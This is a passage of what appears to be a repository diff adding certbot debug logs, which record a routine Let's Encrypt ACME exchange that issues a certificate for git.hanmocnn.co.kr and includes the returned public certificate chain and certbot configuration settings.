"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZi02MlZJeTV1RjZXS1VNXzBqNFZlNDdNVE1JLUJrVmhQNXpYVDFUZkN6cmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA5MjA2NzE2In0",
|
||||||
|
"signature": "vMnBNE3IKK2s3YQ5jOEAYzwlZrq0I89Cz-8t911nhsBrHCuDTbtQuSMQayO0c3OVf4jBxJLJuEYYPYmEPZ679TcNLQTi8Fl8e2SKqaH8-CYrN29R1zgsAYE_9JbhZIQA_ereyzJqyqoQo7UFNwoDmbZmMopZoKOChHfFt8vcaShIEL_7VVZSLJ3Mfi-BuPg0Ma0plB86pstM-3T0xoc2p0c5uDPagrreaGwj0Phkt_-Lu5sLDIFXMUpnZxsFLknAW8pv6F3AsT_qA1BQgD460593TH54HbFERLM2avWrArxwf4u05wVD9MG8-9Aoi-sREAvGv5MojORDx51tDaSqxA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:25,999:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480409206716 HTTP/1.1" 200 454
|
||||||
|
2026-02-15 01:53:26,000:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:25 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480409206716
|
||||||
|
Replay-Nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-22T01:53:23Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480409206716",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2"
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:26,000:DEBUG:acme.client:Storing nonce: qLPTsdtf7nABj_xfpx_vC8SHnUvfzzrQZwNnFbBx2xeMVgUvgqM
|
||||||
|
2026-02-15 01:53:26,000:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:53:26,005:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjduQUJqX3hmcHhfdkM4U0huVXZmenpyUVp3Tm5GYkJ4MnhlTVZnVXZncU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyIn0",
|
||||||
|
"signature": "i8RhvsB81LlMh7nm_ItJXK5fXbZr8YsqP7SDnbEa30hEmK5g0n0-f7hDhua2Qv4MY80fAcQYVJpwT9YGiuVv_iDVrUY68BpwalRci79vAC0jBXaJb1sN4IOpc6fTgQnJqGX04YZqRvgcg8k5W4J31FoGqcNi8kQapst_XpZ1ylAcVDNhJD4klSlRyA2CAf43WO7Ra8V92iSoUBBMokysa83OnglG6NO6KnWTgmu9IxmnCZkQceBmsIj7U3tKdgOLxllgARu2GKgRtTOoGmDouzUeMTRXr9L_pMA5ZzT_WhknVTsOZ7Wp5dSes-o0t_z5rSF16MKfZDFM1VT-9sAlsQ",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:26,183:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2 HTTP/1.1" 200 2885
|
||||||
|
2026-02-15 01:53:26,184:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:26 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2885
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1>;rel="alternate"
|
||||||
|
Replay-Nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp
|
||||||
|
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT
|
||||||
|
Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh
|
||||||
|
AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP
|
||||||
|
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx
|
||||||
|
AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE
|
||||||
|
AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx
|
||||||
|
Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC
|
||||||
|
PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan
|
||||||
|
J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac
|
||||||
|
LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4
|
||||||
|
FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ
|
||||||
|
TqpyEvrK/2BVnebJ42j/TLbZKe2F
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
|
||||||
|
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
|
||||||
|
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
|
||||||
|
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
|
||||||
|
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
|
||||||
|
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
|
||||||
|
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
|
||||||
|
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
|
||||||
|
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
|
||||||
|
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
|
||||||
|
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
|
||||||
|
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
|
||||||
|
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
|
||||||
|
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
|
||||||
|
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
|
||||||
|
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
|
||||||
|
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
|
||||||
|
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
|
||||||
|
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
|
||||||
|
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
|
||||||
|
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
|
||||||
|
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
|
||||||
|
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
|
||||||
|
u1igv3OefnWjSQ==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-15 01:53:26,184:DEBUG:acme.client:Storing nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0
|
||||||
|
2026-02-15 01:53:26,185:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:53:26,189:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmZFWmFUalNwQU5GdEFHT3AwUUVZblFMZml1WTgtdGJnblNmeEtJNzh1VjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyLzEifQ",
|
||||||
|
"signature": "V4Gjh8GxzcOzTh-QYcEuKufBewF8gp3FUxRLWPCMFeDQpFcebcsIliEbqZmzr0BFuMSqVYPYvbWBFs3Dhtf9KwoKR9RQnIVpZd_Adku-kH5-ZETduBxSg8OhPZDnXM7JRo3kFSueQTRhb_wmc8t8myVsTkStPIi9QQ-9KxDK-9eTKq6oddpEwkLtfn-HcNYFGb9rUl4kemxou-p57Q7syOVYFoTxAMgqfWlqoGEkPiOPijvc21QV6heLOFL237APw6mah-TFy__FKWE2qsMnqwUt-j-0zc8jamnjEZkOBWmeLCmSm0VHrlRWH-YnZ7r-f19cfCMpZzPmc-m-gs3aTw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:53:26,380:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1 HTTP/1.1" 200 2320
|
||||||
|
2026-02-15 01:53:26,381:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:53:26 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2320
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/0>;rel="alternate"
|
||||||
|
Replay-Nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp
|
||||||
|
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT
|
||||||
|
Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh
|
||||||
|
AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP
|
||||||
|
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx
|
||||||
|
AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE
|
||||||
|
AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx
|
||||||
|
Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC
|
||||||
|
PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan
|
||||||
|
J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac
|
||||||
|
LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4
|
||||||
|
FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ
|
||||||
|
TqpyEvrK/2BVnebJ42j/TLbZKe2F
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
|
||||||
|
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
|
||||||
|
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
|
||||||
|
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
|
||||||
|
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
|
||||||
|
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
|
||||||
|
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
|
||||||
|
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
|
||||||
|
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
|
||||||
|
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
|
||||||
|
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
|
||||||
|
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
|
||||||
|
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
|
||||||
|
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
|
||||||
|
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-15 01:53:26,381:DEBUG:acme.client:Storing nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q
|
||||||
|
2026-02-15 01:53:26,383:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
|
||||||
|
2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-7.
|
||||||
|
2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-7.
|
||||||
|
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-7/cert.pem.
|
||||||
|
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-7/privkey.pem.
|
||||||
|
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-7/chain.pem.
|
||||||
|
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-7/fullchain.pem.
|
||||||
|
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-7/README.
|
||||||
|
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
|
||||||
|
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
|
||||||
|
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_map={'webroot_path'} (set by user).
|
||||||
|
2026-02-15 01:53:26,398:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Successfully received certificate.
|
||||||
|
Certificate is saved at: /etc/letsencrypt/live/npm-7/fullchain.pem
|
||||||
|
Key is saved at: /etc/letsencrypt/live/npm-7/privkey.pem
|
||||||
|
This certificate expires on 2026-05-16.
|
||||||
|
These files will be updated when the certificate renews.
|
||||||
|
2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
|
||||||
|
2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
|
||||||
|
2026-02-15 01:53:26,402:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
|
||||||
|
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
|
||||||
|
* Donating to EFF: https://eff.org/donate-le
|
||||||
608
npm/data/logs/letsencrypt.log.1
Normal file
608
npm/data/logs/letsencrypt.log.1
Normal file
@@ -0,0 +1,608 @@
|
|||||||
|
2026-02-15 01:51:49,888:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-6', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr']
|
||||||
|
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-15 01:51:49,906:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffa0e50390>
|
||||||
|
Prep: True
|
||||||
|
2026-02-15 01:51:49,908:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffa0e50390> and installer None
|
||||||
|
2026-02-15 01:51:49,908:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-15 01:51:50,141:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-15 01:51:50,142:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-15 01:51:50,147:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-15 01:51:50,678:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-15 01:51:50,679:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:50 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"H0mgb220UuM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-15 01:51:50,680:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr
|
||||||
|
2026-02-15 01:51:50,687:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-15 01:51:50,687:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-15 01:51:50,843:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-15 01:51:50,844:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:51:50 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
